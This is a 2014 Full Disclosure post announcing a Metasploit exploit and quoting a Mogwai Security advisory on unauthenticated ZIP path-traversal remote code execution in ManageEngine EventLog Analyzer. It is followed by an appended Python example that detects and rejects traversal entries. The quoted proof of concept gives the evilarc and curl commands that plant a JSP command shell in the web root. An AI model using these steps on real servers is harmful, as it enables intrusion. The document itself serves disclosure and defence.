Hi all,

h0ng10 from Mogwai Security has found a file upload leading to RCE in Eventlog Analyzer (see advisory below for a snippet or go to http://seclists.org/fulldisclosure/2014/Aug/86).

h0ng10 communicated this over a year ago to ManageEngine but they failed to fix it. When I found and communicated the same vulnerability to ManageEngine a week ago, they accepted my report as valid and said they would look into it. There was no mention of h0ng10's previous discovery, so I don't know what they did with it - perhaps they "lost" or "misplaced" it?

Anyway, I had an exploit ready for when they fixed it, but since the vulnerability information is out, I'm releasing the exploit today. The exploit credits h0ng10 as the original vulnerability discoverer and can be found at:
https://github.com/rapid7/metasploit-framework/pull/3732

This will hopefully be integrated in Metasploit soon. The exploit has been thoroughly tested on many Windows and Linux versions.

Thanks to h0ng10 and Mogwai Security for featuring in the ManageOwnage Series!

Regards,
Pedro

On 31 August 2014 16:39, Advisories <[email protected]> wrote:
> Mogwai Security Advisory MSA-2014-01
> ----------------------------------------------------------------------
> Title: ManageEngine EventLog Analyzer Multiple Vulnerabilities
> Product: ManageEngine EventLog Analyzer
> Affected versions: EventLog Analyzer 9.9 (Build 9002) on Windows/Linux
> Impact: critical
> Remote: yes
> Product link: http://www.manageengine.com/products/eventlog/
> Reported: 18/04/2013
> by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
>
> Vulnerability description:
> ----------------------------------------------------------------------
> 1) Unauthenticated remote code execution
> ME EventLog Analyzer contains an "agentUpload" servlet which is used by Agents
> to send log data as zip files to the central server. Files can be uploaded
> without authentication and are stored/decompressed in the "data" subdirectory.
>
> As the decompress procedure is handling the file names in the ZIP file in an
> insecure way it is possible to store files in the web root of the server. This can
> be used to upload/execute code with the rights of the application server.
>
> Proof of concept:
> ----------------------------------------------------------------------
> 1) Unauthenticated remote code execution
>
> - Create a malicious zip archive with the help of evilarc[1]
>   evilarc.py -d 2 -o unix -p webapps/event cmdshell.jsp
> - Send the malicious archive to the agentUpload servlet
>   curl -F "[email protected]" http://172.16.37.131:8400/agentUpload
> - Enjoy your shell
>   http://172.16.37.131:8400/cmdshell.jsp
>
> A working Metasploit module will be released next week.
>
> ----------------------------------------------------------------------
> Mogwai, IT-Sicherheitsberatung Muench
> Steinhoevelstrasse 2/2
> 89075 Ulm (Germany)
> [email protected]

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
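The decompression flaw described in the advisory, as an added example that is not part of the original post or of the product: a Python check that resolves every entry name of an uploaded ZIP against the destination directory and refuses the whole archive if any entry would land outside it, which is the validation the agentUpload decompress step was missing. The archive contents, entry names and scratch directory are all constructed for the demonstration.

```python
import io
import os
import posixpath
import tempfile
import zipfile
from pathlib import PurePosixPath, PureWindowsPath


def unsafe_entries(zip_bytes: bytes, dest: str) -> list[str]:
    """Archive entry names that would land outside dest when extracted."""
    dest_real = os.path.realpath(dest)
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            # ZIP names are '/'-separated, but Windows extractors also honour '\'.
            norm = posixpath.normpath(name.replace("\\", "/"))
            rooted = PurePosixPath(norm).is_absolute() or PureWindowsPath(norm).is_absolute()
            target = os.path.realpath(os.path.join(dest_real, norm.lstrip("/")))
            inside = target == dest_real or target.startswith(dest_real + os.sep)
            if rooted or not inside:
                bad.append(name)
    return bad


def safe_extract(zip_bytes: bytes, dest: str) -> list[str]:
    """Refuse the whole upload if any entry escapes dest, else extract it. CPython's
    extractall() strips '..' and roots itself, but silently; refusing keeps it visible."""
    bad = unsafe_entries(zip_bytes, dest)
    if bad:
        raise ValueError(f"upload rejected, traversal entries: {bad}")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
        return zf.namelist()


def build_zip(entries: dict[str, bytes]) -> bytes:
    # Construct an in-memory ZIP with arbitrary entry names (sample data only).
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples: a normal agent upload, and one whose extra entries climb out
# of the data directory in the three shapes a decompressor has to catch.
BENIGN_ZIP = build_zip({"host1/security.log": b"sample log line\n"})
HOSTILE_ZIP = build_zip({
    "host1/security.log": b"sample log line\n",
    "../../webapps/event/dropped.jsp": b"<%-- placeholder --%>",    # '..' climb, as in the advisory
    "..\\..\\webapps\\event\\dropped2.jsp": b"<%-- placeholder --%>",  # backslash variant
    "/opt/webapps/event/dropped3.jsp": b"<%-- placeholder --%>",    # absolute name
})
SCRATCH = tempfile.mkdtemp(prefix="ela-data-")  # stands in for the server's "data" directory
```

The hostile archive is refused as a whole even though one of its entries is harmless, so a tampered upload never gets partially written.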
